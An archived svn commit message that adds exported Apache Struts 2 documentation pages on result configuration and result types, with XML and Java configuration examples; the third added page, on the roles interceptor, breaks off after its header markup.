struts-commits mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From lukaszlen...@apache.org
Subject svn commit: r869821 [29/43] - in /websites/production/struts/content/development/2.x/docs: ./ ajax-validation.data/ big-picture.data/ chaining-interceptor.data/ colophon.data/ config-browser-plugin.data/ create-struts-2-web-application-using-maven-to-m...
Date Wed, 17 Jul 2013 09:31:13 GMT
Added: websites/production/struts/content/development/2.x/docs/result-configuration.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/result-configuration.html (added)
+++ websites/production/struts/content/development/2.x/docs/result-configuration.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,286 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Result Configuration</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="configuration-elements.html">Configuration Elements</a>&nbsp;&gt;&nbsp;<a href="result-configuration.html">Result Configuration</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Result Configuration</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14118">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14118">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14118">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>When an <a shape="rect" href="action.html" title="action">action</a> class method completes, it returns a String. The value of the String is used to select a result element. An action mapping will often have a set of results representing different possible outcomes. A standard set of result tokens are defined by the <tt>ActionSupport</tt> base class.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Predefined result names</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+String SUCCESS = "success";
+String NONE    = "none";
+String ERROR   = "error";
+String INPUT   = "input";
+String LOGIN   = "login";
+]]></script>
+</div></div>
+
+<p>Of course, applications can define other result tokens to match specific cases.</p>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif" height="16" width="16" alt="" border="0"> Returning <tt><a shape="rect" class="external-link" href="http://struts.apache.org/2.x/struts2-core/apidocs/com/opensymphony/xwork2/Action.html#NONE">ActionSupport.NONE</a></tt> (or <tt>null</tt>) from an <a shape="rect" href="action.html" title="action">action</a> class method causes the results processing to be skipped. This is useful if the action fully handles the result processing such as writing directly to the HttpServletResponse OutputStream.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-ResultElements"></a>Result Elements</h2>
+
+<p>The result element has two jobs. First, it provides a logical name. An <tt>Action</tt> can pass back a token like "success" or "error" without knowing any other implementation details. Second, the result element provides a result type. Most results simply forward to a server page or template, but other <a shape="rect" href="result-types.html" title="Result Types">Result Types</a> can be used to do more interesting things.</p>
+
+<h3><a shape="rect" name="ResultConfiguration-IntelligentDefaults"></a>Intelligent Defaults</h3>
+
+<p>Each package may set a default result type to be used if none is specified in a result element. If one package extends another, the "child" package can set its own default result, or inherit one from the parent.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Setting a default Result Type</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result-types&gt;
+   &lt;result-type name="dispatcher" default="true"
+                class="org.apache.struts2.dispatcher.ServletDispatcherResult" /&gt;
+&lt;/result-types&gt;
+]]></script>
+</div></div>
+
+<p>If a <tt>type</tt> attribute is not specified, the framework will use the default <tt>dispatcher</tt> type, which forwards to another web resource. If the resource is a JavaServer Page, then the container will render it, using its JSP engine.</p>
+
+<p>Likewise if the <tt>name</tt> attribute is not specified, the framework will give it the name "success".</p>
+
+<p>Using these intelligent defaults, the most often used result types also become the simplest.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Result element without defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result name="success" type="dispatcher"&gt;
+    &lt;param name="location"&gt;/ThankYou.jsp&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>A Result element using some defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result&gt;
+    &lt;param name="location"&gt;/ThankYou.jsp&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+
+<p>The <tt>param</tt> tag sets a property on the Result object. The most commonly-set property is <tt>location</tt>, which usually specifies the path to a web resources. The <tt>param</tt> attribute is another intelligent default.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Result element using more defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result&gt;/ThankYou.jsp&lt;/result&gt;
+]]></script>
+</div></div>
+
+<p>Mixing results with intelligent defaults with other results makes it easier to see the "critical path".</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Multiple Results</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="Hello"&gt;
+    &lt;result&gt;/hello/Result.jsp&lt;/result&gt;
+    &lt;result name="error"&gt;/hello/Error.jsp&lt;/result&gt;
+    &lt;result name="input"&gt;/hello/Input.jsp&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>A special 'other' result can be configured by adding a result with name="*".  This result will only be selected if no result is found with a matching name.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>'*' Other Result</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="Hello"&gt;
+    &lt;result&gt;/hello/Result.jsp&lt;/result&gt;
+    &lt;result name="error"&gt;/hello/Error.jsp&lt;/result&gt;
+    &lt;result name="input"&gt;/hello/Input.jsp&lt;/result&gt;
+    &lt;result name="*"&gt;/hello/Other.jsp&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif" height="16" width="16" alt="" border="0"> The name="*" is <b>not</b> a wildcard pattern, it is a special name that is only selected if an exact match is not found.</p>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" height="16" width="16" alt="" border="0"> In most cases if an action returns an unrecognized result name this would be a programming error and should be fixed.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-GlobalResults"></a>Global Results</h2>
+
+<p>Most often, results are nested with the action element. But some results apply to multiple actions. In a secure application, a client might try to access a page without being authorized, and many actions may need access to a "logon" result.</p>
+
+<p>If actions need to share results, a set of global results can be defined for each package. The framework will first look for a local result nested in the action. If a local match is not found, then the global results are checked.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Defining global results</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;global-results&gt;
+    &lt;result name="error"&gt;/Error.jsp&lt;/result&gt;
+    &lt;result name="invalid.token"&gt;/Error.jsp&lt;/result&gt;
+    &lt;result name="login" type="redirectAction"&gt;Logon!input&lt;/result&gt;
+&lt;/global-results&gt;
+]]></script>
+</div></div>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/lightbulb_on.gif" height="16" width="16" alt="" border="0"> For more about results, see <a shape="rect" href="result-types.html" title="Result Types">Result Types</a>.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-DynamicResults"></a>Dynamic Results</h2>
+
+<p>A result may not be known until execution time. Consider the implementation of a state-machine-based execution flow; the next state might depend on any combination of form input elements, session attributes, user roles, moon phase, etc. In other words, determining the next action, input page, etc. may not be known at configuration time.</p>
+
+<p>Result values may be retrieved from its corresponding Action implementation by using EL expressions that access the Action's properties, just like the Struts 2 tag libraries. So given the following Action fragment:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>FragmentAction implementation</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+private String nextAction;
+
+public String getNextAction() {
+    return nextAction;
+}
+]]></script>
+</div></div>
+
+<p>you might define a result like this:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>FragmentAction configuration</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="fragment" class="FragmentAction"&gt;
+    &lt;result name="next" type="redirectAction"&gt;${nextAction}&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>If a <tt>FragmentAction</tt> method returns "next" the actual <em>value</em> of that result will be whatever is in <tt>FragmentAction</tt>'s <tt>nextAction</tt> property. So <tt>nextAction</tt> may be computed based on whatever state information necessary then passed at runtime to "next"'s <tt>redirectAction</tt>.</p>
+
+<p>See <a shape="rect" href="parameters-in-configuration-results.html" title="Parameters in configuration results">Parameters in configuration results</a> for an expanded discussion.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/result-types.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/result-types.html (added)
+++ websites/production/struts/content/development/2.x/docs/result-types.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,227 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Result Types</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="result-types.html">Result Types</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Result Types</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14035">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14035">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14035">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>Most use cases can be divided into two phases. First, we need to change or query the application's state, and then we need to present an updated view of the application. The Action class manages the application's state, and the Result Type manages the view.</p>
+
+<h2><a shape="rect" name="ResultTypes-PredefinedResultTypes"></a>Predefined Result Types</h2>
+
+<p>The framework provides several implementations of the <tt>com.opensymphony.xwork2.Result</tt> interface, ready to use in your own applications.</p>
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="chain-result.html" title="Chain Result">Chain Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="action-chaining.html" title="Action Chaining">Action Chaining</a> </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="dispatcher-result.html" title="Dispatcher Result">Dispatcher Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for web resource integration, including <a shape="rect" href="jsp.html" title="JSP">JSP</a> integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="freemarker-result.html" title="FreeMarker Result">FreeMarker Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="freemarker.html" title="FreeMarker">FreeMarker</a> integration </td></tr><tr><td colspan="1" rowspan="1" cla
 ss="confluenceTd"> <a shape="rect" href="httpheader-result.html" title="HttpHeader Result">HttpHeader Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to control special HTTP behaviors </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="redirect-result.html" title="Redirect Result">Redirect Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to redirect to another URL (web resource) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="redirect-action-result.html" title="Redirect Action Result">Redirect Action Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to redirect to another action mapping </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="stream-result.html" title="Stream Result">Stream Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to stream an InputStream back to the browser (usually for f
 ile downloads) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="velocity-result.html" title="Velocity Result">Velocity Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="velocity.html" title="Velocity">Velocity</a> integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="xsl-result.html" title="XSL Result">XSL Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for XML/XSLT integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="plaintext-result.html" title="PlainText Result">PlainText Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to display the raw content of a particular page (i.e jsp, HTML) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="tiles-plugin.html" title="Tiles Plugin">Tiles Result</a> </td><td colspan="1" rowspan="1" class="con
 fluenceTd"> Used to provide Tiles integration </td></tr></tbody></table>
+</div>
+
+
+<h3><a shape="rect" name="ResultTypes-Optional"></a>Optional</h3>
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="jasperreports-plugin.html" title="JasperReports Plugin">JasperReports Plugin</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="jasperreports-tutorial.html" title="JasperReports Tutorial">JasperReports Tutorial</a> integration </td><td colspan="1" rowspan="1" class="confluenceTd"> Optional, third-party plugin </td></tr></tbody></table>
+</div>
+
+<p>Additional Result Types can be created and plugged into an application by implementing the <tt>com.opensymphony.xwork2.Result</tt> interface. Custom Result Types might include generating an email or JMS message, generating images, and so forth.</p>
+
+<h2><a shape="rect" name="ResultTypes-DefaultParameters"></a>Default Parameters</h2>
+
+<p>To minimize configuration, Results can be configured with a single value, which will be converted into a parameter, and each Result can specify which parameter this value should be set as.  For example, here is a result defined in XML that uses a default parameter:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result type="freemarker"&gt;foo.fm&lt;/result&gt;
+]]></script>
+</div></div>
+<p>That is the equivalent to this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result type="freemarker"&gt;
+  &lt;param name="location"&gt;foo.vm&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+<p>Since probably 95% of your actions won't need results that contain multiple parameters, this little shortcut saves you a significant amount of configuration.  It also follows that if you have specified the default parameter, you don't need to set the same parameter as a specifically-named parameter.</p>
+
+<h2><a shape="rect" name="ResultTypes-RegisteringResultTypes"></a>Registering Result Types</h2>
+
+<p>All Result Types are plugged in via the <a shape="rect" href="result-configuration.html" title="Result Configuration">Result Configuration</a>.</p>
+
+<h2><a shape="rect" name="ResultTypes-Next%3ADispatcherListener"></a>Next: <a shape="rect" href="dispatcherlistener.html" title="DispatcherListener">DispatcherListener</a></h2></div>
+        </div>
+
+                    <div class="tabletitle">
+                Children
+            <span class="smalltext" id="show" style="display: inline;">
+              <a href="javascript:showChildren()">Show Children</a></span>
+            <span class="smalltext" id="hide" style="display: none;">
+              <a href="javascript:hideChildren()">Hide Children</a></span>
+            </div>
+            <div class="greybox" id="children" style="display: none;">
+                                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                            </div>
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/roles-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/roles-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/roles-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,148 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Roles Interceptor</title>
+</head>
+<body onload="init()">
